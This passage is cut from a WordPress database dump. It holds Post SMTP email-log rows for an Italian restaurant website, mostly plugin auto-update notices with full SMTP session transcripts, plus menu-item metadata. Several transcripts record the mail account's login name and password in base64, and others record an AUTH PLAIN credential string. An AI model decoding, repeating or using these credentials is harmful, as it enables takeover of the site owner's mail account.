unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(37078,3646,'solution','Not found, check status column for more info.'),(37079,3646,'success','1'),(37080,3646,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37081,3646,'to_header','webmaster@baldisserri.com'),(37082,3646,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(37083,3646,'original_to','webmaster@baldisserri.com'),(37084,3646,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37085,3646,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL version 4.0.5\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37086,3646,'original_headers',''),(37087,3646,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 07 Dec 2020 19:22:37 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <5eefe17f6e58a26cc3c91899b6995359@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Tue, 08 Dec 2020 00:22:37 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Real=\r\nly Simple SSL version 4.0.5=0A=0A=0AIf you experience any issues or need=\r\n support, the volunteers in the WordPress.org support forums may be able=\r\n to help.=0Ahttps://wordpress.org/support/forums/=0A=0AThe WordPress Tea=\r\nm\r\n.\r\n250 OK id=1kmQm5-0000zQ-FP\r\n'),(37088,3647,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(37089,3647,'success',''),(37090,3647,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37091,3647,'to_header','webmaster@baldisserri.com'),(37092,3647,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37093,3647,'original_to','webmaster@baldisserri.com'),(37094,3647,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37095,3647,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Mailjet for WordPress version 5.2.5\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37096,3647,'original_headers',''),(37097,3647,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 08 Dec 2020 07:24:20 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(37098,3648,'solution','Not found, check status column for more info.'),(37099,3648,'success','1'),(37100,3648,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37101,3648,'to_header','webmaster@baldisserri.com'),(37102,3648,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(37103,3648,'original_to','webmaster@baldisserri.com'),(37104,3648,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37105,3648,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Mailjet for WordPress version 5.2.5\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37106,3648,'original_headers',''),(37107,3648,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 08 Dec 2020 07:24:22 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <118f7cf7170ec4d9ec55118b4ef0ebbf@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Tue, 08 Dec 2020 12:24:22 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Mail=\r\njet for WordPress version 5.2.5=0A=0A=0AIf you experience any issues or=\r\n need support, the volunteers in the WordPress.org support forums may be=\r\n able to help.=0Ahttps://wordpress.org/support/forums/=0A=0AThe WordPres=\r\ns Team\r\n.\r\n250 OK id=1kmc2Y-0007zH-JN\r\n'),(37108,3649,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(37109,3649,'success',''),(37110,3649,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37111,3649,'to_header','webmaster@baldisserri.com'),(37112,3649,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37113,3649,'original_to','webmaster@baldisserri.com'),(37114,3649,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37115,3649,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Popup Builder version 3.71\n- WooCommerce version 4.8.0\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37116,3649,'original_headers',''),(37117,3649,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 08 Dec 2020 19:22:40 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(37118,3650,'solution','Not found, check status column for more info.'),(37119,3650,'success','1'),(37120,3650,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37121,3650,'to_header','webmaster@baldisserri.com'),(37122,3650,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(37123,3650,'original_to','webmaster@baldisserri.com'),(37124,3650,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37125,3650,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Popup Builder version 3.71\n- WooCommerce version 4.8.0\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37126,3650,'original_headers',''),(37127,3650,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 08 Dec 2020 19:22:42 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <4ef42e7972e5978f7d97404cfe5ccafe@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Wed, 09 Dec 2020 00:22:42 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Popu=\r\np Builder version 3.71=0A- WooCommerce version 4.8.0=0A=0A=0AIf you expe=\r\nrience any issues or need support, the volunteers in the WordPress.org s=\r\nupport forums may be able to help.=0Ahttps://wordpress.org/support/forum=\r\ns/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1kmnFi-0002tn-Iq\r\n'),(37128,3651,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(37129,3651,'success',''),(37130,3651,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37131,3651,'to_header','webmaster@baldisserri.com'),(37132,3651,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37133,3651,'original_to','webmaster@baldisserri.com'),(37134,3651,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37135,3651,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- UpdraftPlus - Backup/Restore (from version 1.16.41 to 1.16.42)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37136,3651,'original_headers',''),(37137,3651,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 10 Dec 2020 19:23:02 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(37138,3652,'solution','Not found, check status column for more info.'),(37139,3652,'success','1'),(37140,3652,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37141,3652,'to_header','webmaster@baldisserri.com'),(37142,3652,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(37143,3652,'original_to','webmaster@baldisserri.com'),(37144,3652,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37145,3652,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- UpdraftPlus - Backup/Restore (from version 1.16.41 to 1.16.42)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37146,3652,'original_headers',''),(37147,3652,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 10 Dec 2020 19:23:04 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <0b346e53cb45cfa74b7b066b0995e436@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Fri, 11 Dec 2020 00:23:04 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Updr=\r\naftPlus - Backup/Restore (from version 1.16.41 to 1.16.42)=0A=0A=0AIf yo=\r\nu experience any issues or need support, the volunteers in the WordPress=\r\n..org support forums may be able to help.=0Ahttps://wordpress.org/support=\r\n/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1knWDA-00058l-Kk\r\n'),(37148,3653,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(37149,3653,'success',''),(37150,3653,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37151,3653,'to_header','webmaster@baldisserri.com'),(37152,3653,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37153,3653,'original_to','webmaster@baldisserri.com'),(37154,3653,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37155,3653,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Smash Balloon Instagram Feed (from version 2.6.1 to 2.6.2)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37156,3653,'original_headers',''),(37157,3653,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sat, 12 Dec 2020 07:22:47 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(37158,3654,'solution','Not found, check status column for more info.'),(37159,3654,'success','1'),(37160,3654,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37161,3654,'to_header','webmaster@baldisserri.com'),(37162,3654,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(37163,3654,'original_to','webmaster@baldisserri.com'),(37164,3654,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37165,3654,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Smash Balloon Instagram Feed (from version 2.6.1 to 2.6.2)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37166,3654,'original_headers',''),(37167,3654,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sat, 12 Dec 2020 07:22:49 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <2b6a26b4638c4684eb21e63dbd66e41a@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Sat, 12 Dec 2020 12:22:49 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Smas=\r\nh Balloon Instagram Feed (from version 2.6.1 to 2.6.2)=0A=0A=0AIf you ex=\r\nperience any issues or need support, the volunteers in the WordPress.org=\r\n support forums may be able to help.=0Ahttps://wordpress.org/support/for=\r\nums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1ko3vF-0004b9-Ok\r\n'),(37168,3655,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(37169,3655,'success',''),(37170,3655,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37171,3655,'to_header','webmaster@baldisserri.com'),(37172,3655,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37173,3655,'original_to','webmaster@baldisserri.com'),(37174,3655,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37175,3655,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Post SMTP (from version 2.0.15 to 2.0.16)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37176,3655,'original_headers',''),(37177,3655,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sun, 13 Dec 2020 19:23:58 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(37178,3656,'solution','Not found, check status column for more info.'),(37179,3656,'success','1'),(37180,3656,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37181,3656,'to_header','webmaster@baldisserri.com'),(37182,3656,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(37183,3656,'original_to','webmaster@baldisserri.com'),(37184,3656,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37185,3656,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Post SMTP (from version 2.0.15 to 2.0.16)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37186,3656,'original_headers',''),(37187,3656,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sun, 13 Dec 2020 19:24:00 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <0fa44563eb3bcfe52de0d0e3b73b9c28@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Mon, 14 Dec 2020 00:24:00 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Post=\r\n SMTP (from version 2.0.15 to 2.0.16)=0A=0A=0AIf you experience any issu=\r\nes or need support, the volunteers in the WordPress.org support forums m=\r\nay be able to help.=0Ahttps://wordpress.org/support/forums/=0A=0AThe Wor=\r\ndPress Team\r\n.\r\n250 OK id=1kobei-0005fs-RX\r\n'),(38442,3755,'_menu_item_type','custom'),(38443,3755,'_menu_item_menu_item_parent','3733'),(38440,3754,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38441,3754,'_menu_item_icon','null'),(38439,3754,'_menu_item_url','#'),(38411,3751,'_menu_item_icon','null'),(38410,3751,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38362,3746,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38360,3746,'_menu_item_xfn',''),(38361,3746,'_menu_item_url','http://attika.mikado-themes.com/product/crispy-sesame-cake/'),(38338,3744,'_menu_item_target',''),(38248,3734,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38246,3734,'_menu_item_object','custom'),(38247,3734,'_menu_item_target',''),(38217,3731,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38216,3731,'_menu_item_target',''),(38172,3727,'_menu_item_type','custom'),(38173,3727,'_menu_item_menu_item_parent','0'),(38171,3726,'_menu_item_icon','null'),(38141,3723,'_menu_item_icon','null'),(52291,4374,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52292,4374,'_menu_item_icon','null'),(52263,4372,'_menu_item_type','custom'),(52260,4371,'_menu_item_url','#'),(52183,4363,'_menu_item_target',''),(52184,4363,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52070,4351,'_menu_item_icon','null'),(51992,2784,'_wp_attachment_image_alt','v'),(37830,3716,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37823,3715,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Post SMTP (from version 2.0.16 to 2.0.18)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress 